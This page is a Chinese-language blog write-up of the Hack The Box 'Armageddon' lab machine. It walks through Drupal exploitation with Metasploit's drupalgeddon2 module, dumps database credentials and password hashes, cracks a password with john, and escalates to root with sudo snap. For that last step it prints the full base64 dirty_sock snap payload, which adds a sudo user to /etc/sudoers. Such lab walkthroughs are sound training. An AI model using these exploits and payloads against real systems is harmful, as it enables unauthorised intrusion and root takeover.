<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Lucifiel">




    <meta name="keywords" content="Lucifiel, 路西菲尔, Hackthebox, HTB, 渗透测试, 靶场, 靶机, 黑客, Peneration, OSCP, Vulnhub, Vulhub, HackMe, HackTry, Kali, Hacker">


<title>Hackthebox - Armageddon 靶场实战 | Lucifiel&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.2.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Lucifiel&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Lucifiel&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Hackthebox - Armageddon 靶场实战</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Lucifiel</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">八月 4, 2022&nbsp;&nbsp;11:14:26</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="靶场信息"><a href="#靶场信息" class="headerlink" title="靶场信息"></a>靶场信息</h1><img src="/2022/08/04/Armageddon/image1.png" class="">

<h1 id="靶场类型"><a href="#靶场类型" class="headerlink" title="靶场类型"></a>靶场类型</h1><img src="/2022/08/04/Armageddon/image2.png" class="">

<h1 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1><h2 id="NMAP"><a href="#NMAP" class="headerlink" title="NMAP"></a>NMAP</h2><p>首先使用nmap进行扫描</p>
<p>nmap –A -sS –sC –Sv 10.10.10.233</p>
<img src="/2022/08/04/Armageddon/image3.png" class="">

<p>我们可以看到开启了22和80端口</p>
<p>在80端口提示了我们存在robots.txt文件，并且东西很多 咱们访问一下</p>
<img src="/2022/08/04/Armageddon/image4.png" class="">

<p>其中引起我兴趣的东西呢就是&#x2F;MAINTAINERS.txt文件了</p>
<p>这是维护文件，或者说是升级文件，咱们打开看一下</p>
<img src="/2022/08/04/Armageddon/image5.png" class="">

<p>果不其然，里面揭露了Drupal的版本</p>
<p>到这里思路就明了了</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>咱们直接使用msf进行getshell</p>
<p>使用msfconsole打开msf</p>
<p>输入search drupal搜索可用的exp</p>
<img src="/2022/08/04/Armageddon/image6.png" class="">

<p>咱们对比一下版本号，最后一次升级为7.56版本，升级时间为2017-06-21 也就是说在这之前的exp都可以直接pass了</p>
<p>咱们把目光放在2018-03-28的exp上</p>
<p>use exploit&#x2F;unix&#x2F;webapp&#x2F;drupal_drupalgeddon2</p>
<p>option</p>
<p>set RHOSTS 10.10.10.233</p>
<p>set lhost 10.10.14.135</p>
<p>exploit</p>
<img src="/2022/08/04/Armageddon/image7.png" class="">

<p>成功获取到一个shell</p>
<img src="/2022/08/04/Armageddon/image8.png" class="">

<p>咱们运行一下无法查看到uid，但是可以查看到文件</p>
<p>但我偏不，我就想知道当前用户怎么办？</p>
<p>简单</p>
<p>输入shell</p>
<img src="/2022/08/04/Armageddon/image9.png" class="">

<p>一开始我以为是卡住了，但后来想想不对，好像是获取到了</p>
<img src="/2022/08/04/Armageddon/image10.png" class="">

<p>执行命令后确认命令是可以被执行的？</p>
<p>那咱们先想办法获得一个稳定的shell吧</p>
<p>&#x2F;bin&#x2F;bash –i</p>
<img src="/2022/08/04/Armageddon/image11.png" class="">

<p>不一样被我搞到shell了，可给我NB坏了，叉会儿腰</p>
<img src="/2022/08/04/Armageddon/image12.png" class="">

<p>用户是apache，权限还是有点低啊，咱们在内核里看到了一个域名，或许有用，先记录下来吧，暂时还不知道是干嘛的，咱们得想想办法去搞到更高一点的权限</p>
<p>我在查看源码和配置文件的时候，在..&#x2F;sites&#x2F;default&#x2F;settings.php中找到了数据库的账号密码</p>
<img src="/2022/08/04/Armageddon/image13.png" class="">

<p>database &#x3D;&gt; drupal</p>
<p>username &#x3D;&gt; drupaluser</p>
<p>password &#x3D;&gt; CQHEy@9M*m23gBVj</p>
<p>他不是开启了22端口吗，咱们直接ssh登录吧</p>
<img src="/2022/08/04/Armageddon/image14.png" class="">

<p>嗯？密码不对？啊这，就有点尴尬了呀</p>
<p>没事儿，咱们换一种方法，既然从外面来不行，那咱们就从里面来，咳咳 没开车哈 请不要脑补</p>
<p>在咱们的shell里直接使用mysql进行登录</p>
<img src="/2022/08/04/Armageddon/image15.png" class="">

<p>很奇怪，正常输入账号密码会卡住或者报错或者出现一些奇怪的东西</p>
<img src="/2022/08/04/Armageddon/image16.png" class="">

<p>经过多方测试以及查找资料后，得出正确的查询命令</p>
<p>mysql -u “drupaluser” -h “localhost” “-pCQHEy@9M*m23gBVj” “drupal” -e “select uid, name, pass from users;”</p>
<img src="/2022/08/04/Armageddon/image17.png" class="">

<p>brucetherealadmin账户一看这么长就知道不简单，俗话说的好，长的人一定不简单，咋办？爆它！</p>
<p>将用户brucetherealadmin的hash保存为一个文本文件</p>
<img src="/2022/08/04/Armageddon/image18.png" class="">

<p>请出我们的神器john</p>
<p>john –wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt admin</p>
<p>爆破成功</p>
<img src="/2022/08/04/Armageddon/image19.png" class="">

<p>密码为booboo</p>
<p>现在咱们直接ssh登录就可以了</p>
<p>ssh <a href="mailto:brucetherealadmin@10.10.10.233">brucetherealadmin@10.10.10.233</a></p>
<img src="/2022/08/04/Armageddon/image20.png" class="">

<p>OK，咱们现在总算是有一个完整的用户权限了</p>
<img src="/2022/08/04/Armageddon/image21.png" class="">

<p>成功获得user权限的flag</p>
<p><strong>权限提升</strong></p>
<p>咱们使用sudo –l来查看一下sudo权限</p>
<img src="/2022/08/04/Armageddon/image22.png" class="">

<p>咱们可以不使用密码就调用root权限安装snap，那思路就有了呀，搞起来兄弟们</p>
<p>生成一个snap的马</p>
<p>参考链接：</p>
<p>Privilege Escalation in Ubuntu Linux (dirty_sockv2 exploit)：<a target="_blank" rel="noopener" href="https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html">https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html</a></p>
<p>Playing with Dirty Sock：<a target="_blank" rel="noopener" href="https://0xdf.gitlab.io/2019/02/13/playing-with-dirty-sock.html">https://0xdf.gitlab.io/2019/02/13/playing-with-dirty-sock.html</a></p>
<p>生成指令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 -c &#x27;print&quot;aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw&quot;+ &quot;A&quot;*4256 + &quot;==&quot;&#x27; | base64 -d &gt; exploit.snap</span><br></pre></td></tr></table></figure>

<img src="/2022/08/04/Armageddon/image23.png" class="">

<p>直接运行改文件，发现还有一点错误，需要想办法解决一下</p>
<img src="/2022/08/04/Armageddon/image24.png" class="">

<p>加上 –devmode 成功安装</p>
<p>sudo &#x2F;usr&#x2F;bin&#x2F;snap install –devmode exploit.snap</p>
<img src="/2022/08/04/Armageddon/image25.png" class="">

<p>切换到dirty_sock用户，密码也是dirty_sock</p>
<p>查看一下权限</p>
<img src="/2022/08/04/Armageddon/image26.png" class="">

<p>提权成功</p>
<img src="/2022/08/04/Armageddon/image27.png" class="">

<p>成功拿到root权限的flag</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Lucifiel</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://www.lucifiel.com/2022/08/04/Armageddon/">http://www.lucifiel.com/2022/08/04/Armageddon/</a></span>
                    </p>
                
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/Hackthebox/"># Hackthebox</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2022/05/05/Overpass/">TryHackMe - Overpass 靶场实战</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Lucifiel | Powered by Lucifiel</span>
    </div>
</footer>
    </div>
</body>

</html>